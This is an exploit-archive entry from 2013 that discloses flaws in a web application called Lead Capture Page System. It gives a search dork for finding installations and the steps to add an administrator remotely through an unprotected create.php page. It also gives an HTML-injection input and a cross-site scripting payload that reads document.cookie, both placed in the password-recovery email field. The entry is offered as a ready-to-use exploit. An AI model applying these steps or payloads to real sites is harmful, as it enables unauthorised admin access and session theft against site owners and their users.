id: 20891
date: 06/14/2013
title: Lead Capture Page System Multiple Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Lead Capture Page System Multiple Vulnerabilties
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST 
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://leadcapturepagesystem.com/
.:. Dork           : Powered By Lead Capture Page System
####################################################################

===[ Exploit ]===

Remote Add Admin:
=================

Go To [www.site.com/admin/create.php] and Fill in the information

Html Injection:
===============

1-Go To [ww.site.com/admin/getpassword.html]

2-Put on the [Email] any html code like:

<h1>INJECTION</h1>


Cross-Site Scripting:
=====================

1-Go To [ww.site.com/admin/getpassword.html]

2-Put on the [Email] any code like:

"><script>alert(document.cookie)</script>

####################################################################

#  0day.today [2023-03-23]  #